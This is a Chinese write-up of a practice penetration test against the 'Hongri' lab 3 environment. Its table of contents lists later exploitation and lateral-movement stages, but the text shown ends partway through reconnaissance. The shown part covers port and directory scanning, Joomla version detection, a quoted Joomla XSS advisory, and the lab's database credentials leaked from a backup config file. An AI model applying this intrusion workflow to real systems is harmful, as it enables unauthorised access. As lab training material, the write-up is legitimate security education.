红日靶场-3

2024-01-02 13:37:28

目录

前言

外网渗透

外网渗透打点

1、arp

2、nmap

3、nikto

4、whatweb

5、gobuster

6、dirsearch

CMS

1、主页内容

2、/configuration.php~ 目录

3、/administrator 目录

4、Joomla!_version探测

5、joomlascan python脚本

6、joomscan perl脚本

MySQL

1、远程登录

2、查看敏感数据

登录后台

1、成功登录

2、RCE漏洞

蚁剑连接

1、写入shell

2、disable_functions函数绕过

SSH连接

提权

内网渗透

横向渗透1

1、生成木马文件

2、开启监听

3、添加内网路由

横向渗透2

1、建立监听

2、进入meterpreter

3、添加内网路由

4、socks5代理

1、earthworm内网穿透工具

2、配置proxychains4.conf文件

5、内网主机发现

1、第一种模块

2、第二种模块

6、内网攻击

1、密码爆破

2、psexec工具

3、wmiexec.py

7、get flag

前言


在渗透测试中,黑盒测试(Black Box Testing)和白盒测试(White Box Testing)是两种常见的测试方法,它们用于评估目标系统的安全性和弱点。以下是它们的含义和区别:

1. 黑盒测试(Black Box Testing):
   黑盒测试是一种从外部视角进行的测试方法,测试人员对被测试系统的内部结构和实现细节一无所知。测试人员将系统视为一个黑盒子,只关注输入与输出,并不考虑内部工作原理。
   黑盒测试主要侧重于检查系统的功能、安全漏洞、配置错误等。测试人员扮演外部攻击者的角色,尝试基于系统的可见行为和接口来发现潜在的漏洞。

2. 白盒测试(White Box Testing):
   白盒测试是一种从内部视角进行的测试方法,测试人员对被测试系统的内部结构、设计和代码有充分的了解。测试人员可以查看和分析系统的源代码、配置文件和技术文档等内部细节。
   白盒测试主要侧重于评估系统的结构、设计、安全实现和代码质量。测试人员可以使用静态代码分析、代码审查等技术来发现潜在的漏洞和安全风险。

黑盒测试和白盒测试各有优势和适用场景。黑盒测试更加注重系统的功能和用户角度,能够模拟真实攻击者的行为。白盒测试更加注重系统的内部安全性和代码质量,能够深入分析实现细节并发现隐藏的漏洞。

在实际渗透测试中,通常会结合使用黑盒测试和白盒测试的方法,以全面评估系统的安全性。这样可以从不同的角度识别并修复潜在的漏洞,提高系统的防御能力。

靶机搭建
1、首先添加一块VMnet2的网卡,子网地址配为:192.168.93.0
2、启动centos靶机,并且使用  “ service network restart ” 命令来获取ip,因为centos有两块网卡,一块桥接网卡,一块VMnet2网卡;前者做外网ip,后者做内网ip。
3、需要改动的靶机只有centos,别的不能动,也千万不能重启。因为部分服务没有自启动功能。如果需要关机,一定要先把各靶机挂起。
4、因为使用的是桥接网卡,所以我们的kali攻击机的网卡也要使用桥接模式。
5、在centos里面使用 ” ifconfig eth0 “ 命令,来看一下有没有获取到ip;在kali里面使用 “ ip a” 命令看看是否获取到IP。
6、最后,我们去浏览器访问一下目标靶机,看看是否可以访问成功。

192.168.93.10 WIN-8GA56TNV3MV
192.168.93.20 WIN2008
192.168.93.30 WIN7
192.168.93.100 192.168.1.21 Centos
192.168.93.120 Ubantu
192.168.1.20 kali

本次打靶练习是一个黑盒测试。所以没有密码,我们的目标是拿到域控制器的权限,并找到其中的重要文件。

外网渗透

外网渗透打点

1、arp

┌──(root?ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     00:03:0f:2b:90:20       Digital China (Shanghai) Networks Ltd.
192.168.1.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.1.6     3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5     7c:b5:66:a5:f0:a5       Intel Corporate
192.168.1.14    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.13    7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.21    00:0c:29:32:46:c9       VMware, Inc.
192.168.1.4     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9     fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5)   (Unknown: locally administered)
192.168.1.16    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18    30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7     c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.8     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.1.17    42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5)   (Unknown: locally administered)

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded

2、nmap

端口探测

┌──(root?ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds


如何提取端口
┌──(root?ru)-[~/lianxi]
└─# cat ports.nmap                                                                                                  
# Nmap 7.94 scan initiated Fri Dec  1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

# Nmap done at Fri Dec  1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds

┌──(root?ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306

//涉及到 awk、sed、head、tail、xargs等命令。

信息探测

┌──(root?ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|   1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_  2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp   open  http       nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open  tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds


udp探测

┌──(root?ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
2/udp     closed compressnet
9000/udp  closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds


漏洞探测


┌──(root?ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following indications of potential DOM based XSS:
|
|     Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_    Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.1.21:80/
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/6-your-template
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: mod-search-searchword87
|     Form action: /index.php/login
|
|     Path: http://192.168.1.21:80/index.php/login
|     Form id: username-lbl
|     Form action: /index.php/login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php/5-your-modules
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: mod-search-searchword87
|     Form action: /index.php/author-login
|
|     Path: http://192.168.1.21:80/index.php/author-login
|     Form id: username-lbl
|     Form action: /index.php/author-login?task=user.login
|
|     Path: http://192.168.1.21:80/index.php
|     Form id: mod-search-searchword87
|     Form action: /index.php
|
|     Path: http://192.168.1.21:80/index.php/4-about-your-home-page
|     Form id: mod-search-searchword87
|_    Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
|   /language/en-GB/en-GB.xml: Joomla version 3.9.12
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds


3、nikto

┌──(root?ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.21
+ Target Hostname:    192.168.1.21
+ Target Port:        80
+ Start Time:         2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


4、whatweb

┌──(root?ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status    : 200 OK
Title     : Home
IP        : 192.168.1.21
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], Script

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : d238a471ae12a7732425ae4995e23fce

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        String       : nginx/1.9.4 (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie 

        String       : d238a471ae12a7732425ae4995e23fce

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : Joomla! - Open Source Content Management

[ OpenSearch ]
        This plugin identifies open search and extracts the URL. 
        OpenSearch is a collection of simple formats for the 
        sharing of search results. 

        String       : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.9.4
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.9.4
        Date: Mon, 07 Oct 2019 08:29:39 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 4001
        Connection: close
        Set-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnly
        Expires: Wed, 17 Aug 2005 00:00:00 GMT
        Last-Modified: Fri, 01 Dec 2023 07:23:51 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip



5、gobuster

┌──(root?ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.21
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media                (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates            (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules              (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin                  (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins              (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes             (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language             (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components           (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache                (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries            (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp                  (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts              (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator        (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli                  (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]


6、dirsearch

┌──(root?ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txt

Error Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.log

Target: http://192.168.1.21/

[15:26:31] Starting:
[15:26:50] 200 -   18KB - /LICENSE.txt
[15:26:50] 200 -    5KB - /README.txt
[15:26:59] 403 -  277B  - /administrator/.htaccess
[15:26:59] 301 -  320B  - /administrator  ->  http://192.168.1.21/administrator/
[15:26:59] 200 -    5KB - /administrator/
[15:26:59] 200 -    2KB - /administrator/includes/
[15:26:59] 200 -   31B  - /administrator/cache/
[15:26:59] 200 -    5KB - /administrator/index.php
[15:26:59] 301 -  325B  - /administrator/logs  ->  http://192.168.1.21/administrator/logs/
[15:26:59] 200 -   31B  - /administrator/logs/
[15:27:02] 301 -  310B  - /bin  ->  http://192.168.1.21/bin/
[15:27:02] 200 -   31B  - /bin/
[15:27:03] 301 -  312B  - /cache  ->  http://192.168.1.21/cache/
[15:27:03] 200 -   31B  - /cache/
[15:27:04] 200 -   31B  - /cli/
[15:27:04] 301 -  317B  - /components  ->  http://192.168.1.21/components/
[15:27:04] 200 -   31B  - /components/
[15:27:05] 200 -    0B  - /configuration.php
[15:27:05] 200 -    2KB - /configuration.php~
[15:27:10] 200 -    3KB - /htaccess.txt
[15:27:11] 301 -  313B  - /images  ->  http://192.168.1.21/images/
[15:27:11] 200 -   31B  - /images/
[15:27:11] 301 -  315B  - /includes  ->  http://192.168.1.21/includes/
[15:27:11] 200 -   31B  - /includes/
[15:27:11] 200 -   16KB - /index.php
[15:27:11] 200 -    9KB - /index.php/login/
[15:27:13] 301 -  315B  - /language  ->  http://192.168.1.21/language/
[15:27:13] 200 -   31B  - /layouts/
[15:27:13] 301 -  316B  - /libraries  ->  http://192.168.1.21/libraries/
[15:27:13] 200 -   31B  - /libraries/
[15:27:15] 301 -  312B  - /media  ->  http://192.168.1.21/media/
[15:27:15] 200 -   31B  - /media/
[15:27:16] 301 -  314B  - /modules  ->  http://192.168.1.21/modules/
[15:27:16] 200 -   31B  - /modules/
[15:27:20] 200 -   31B  - /plugins/
[15:27:21] 301 -  314B  - /plugins  ->  http://192.168.1.21/plugins/
[15:27:23] 200 -  829B  - /robots.txt
[15:27:24] 403 -  277B  - /server-status
[15:27:24] 403 -  277B  - /server-status/
[15:27:28] 301 -  316B  - /templates  ->  http://192.168.1.21/templates/
[15:27:28] 200 -   31B  - /templates/
[15:27:28] 200 -   31B  - /templates/index.html
[15:27:28] 200 -    0B  - /templates/protostar/
[15:27:28] 200 -    0B  - /templates/system/
[15:27:28] 200 -    0B  - /templates/beez3/
[15:27:30] 301 -  310B  - /tmp  ->  http://192.168.1.21/tmp/
[15:27:30] 200 -   31B  - /tmp/
[15:27:35] 200 -    2KB - /web.config.txt


CMS

1、主页内容

主页是一些博客内容。经过探索,没有发现可以利用点。



根据提示这个网站用的模板是Protostar.


经过探测,可以通过这个id号码进行不同内容的访问。不过最多好像只能访问到6.

2、/configuration.php~ 目录


经过目录探测,我们找到了网站的配置文件。而且我们还找到了数据库的账号以及密码。

账号:testuser
密码:cvcvgjASD!@

3、/administrator 目录


果真是Joomla! ,进行下一步探测。

4、Joomla!_version探测

我们可以使用msf里面的辅助模块进行扫描。

msf6 > search Joomla_version

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/joomla_version                   normal  No     Joomla Version Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_version

msf6 >


msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit

[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


经过探测,cms的版本是3.9.12的。那么我们就可以定位到相应的exp了。

┌──(root?ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                                                                                                                                                           | php/webapps/43488.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

┌──(root?ru)-[~/lianxi]
└─# searchsploit -m 43488.txt
  Exploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting
      URL: https://www.exploit-db.com/exploits/43488
     Path: /usr/share/exploitdb/exploits/php/webapps/43488.txt
    Codes: CVE-2018-5263
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt



┌──(root?ru)-[~/lianxi]
└─# ls
43488.txt  ports.gnmap  ports.nmap  ports.xml  port.txt  udp.gnmap  udp.nmap  udp.xml  vuln.gnmap  vuln.nmap  vuln.xml  whatweb.txt  XX.gnmap  XX.nmap  XX.xml

┌──(root?ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps

1. Description

Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20


2. Proof of Concept

Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed


3. Solution:

Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update   


找到了对应的exp了,但是这些漏洞都需要管理员的权限才行。所以我们需要进行下一步探测。

5、joomlascan python脚本

┌──(root?ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5   
-------------------------------------------
             Joomla Scan                  
   Usage: python joomlascan.py <target>    
    Version 0.5beta - Database Entries 1235
         created by Andrea Draghetti       
-------------------------------------------
Robots file found:               > http://192.168.1.21/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs  > http://192.168.1.21/index.php?option=com_actionlogs
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xml
         Explorable Directory    > http://192.168.1.21/components/com_actionlogs/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin       > http://192.168.1.21/index.php?option=com_admin
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_admin/admin.xml
         Explorable Directory    > http://192.168.1.21/components/com_admin/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax        > http://192.168.1.21/index.php?option=com_ajax
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_ajax/ajax.xml
         Explorable Directory    > http://192.168.1.21/components/com_ajax/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners     > http://192.168.1.21/index.php?option=com_banners
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_banners/banners.xml
         Explorable Directory    > http://192.168.1.21/components/com_banners/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config      > http://192.168.1.21/index.php?option=com_config
Component found: com_contact     > http://192.168.1.21/index.php?option=com_contact
         LICENSE file found      > http://192.168.1.21/administrator/components/com_contact/contact.xml
         LICENSE file found      > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content     > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory      > http://192.168.1.21/index.php?option=com_contenthistory
         But possibly it is not active or protected
         Explorable Directory    > http://192.168.1.21/components/com_config/
         Explorable Directory    > http://192.168.1.21/components/com_contact/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_config/
         LICENSE file found      > http://192.168.1.21/administrator/components/com_content/content.xml
         LICENSE file found      > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xml
         Explorable Directory    > http://192.168.1.21/administrator/components/com_contact/
         Explorable Directory    > http://192.168.1.21/components/com_contenthistory/
         Explorable Directory    > http://192.168.1.21/components/com_content/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_contenthistory/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields      > http://192.168.1.21/index.php?option=com_fields
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_fields/fields.xml
         Explorable Directory    > http://192.168.1.21/components/com_fields/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer   > http://192.168.1.21/index.php?option=com_installer
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_installer/installer.xml
         Explorable Directory    > http://192.168.1.21/components/com_installer/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate        > http://192.168.1.21/index.php?option=com_joomlaupdate
         On the administrator components
         LICENSE file found      > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xml
         Explorable Directory    > http://192.168.1.21/components/com_joomlaupdate/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto      > http://192.168.1.21/index.php?option=com_mailto
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/components/com_mailto/mailto.xml
         Explorable Directory    > http://192.168.1.21/components/com_mailto/
Component found: com_media       > http://192.168.1.21/index.php?option=com_media
         But possibly it is not active or protected
         LICENSE file found      > http://192.168.1.21/administrator/components/com_media/media.xml
         Explorable Directory    > http://192.168.1.21/components/com_media/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds   > http://192.168.1.21/index.php?option=com_newsfeeds
         LICENSE file found      > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xml
         Explorable Directory    > http://192.168.1.21/components/com_newsfeeds/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search      > http://192.168.1.21/index.php?option=com_search
         LICENSE file found      > http://192.168.1.21/administrator/components/com_search/search.xml
         Explorable Directory    > http://192.168.1.21/components/com_search/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_search/
Component found: com_users       > http://192.168.1.21/index.php?option=com_users
         LICENSE file found      > http://192.168.1.21/administrator/components/com_users/users.xml
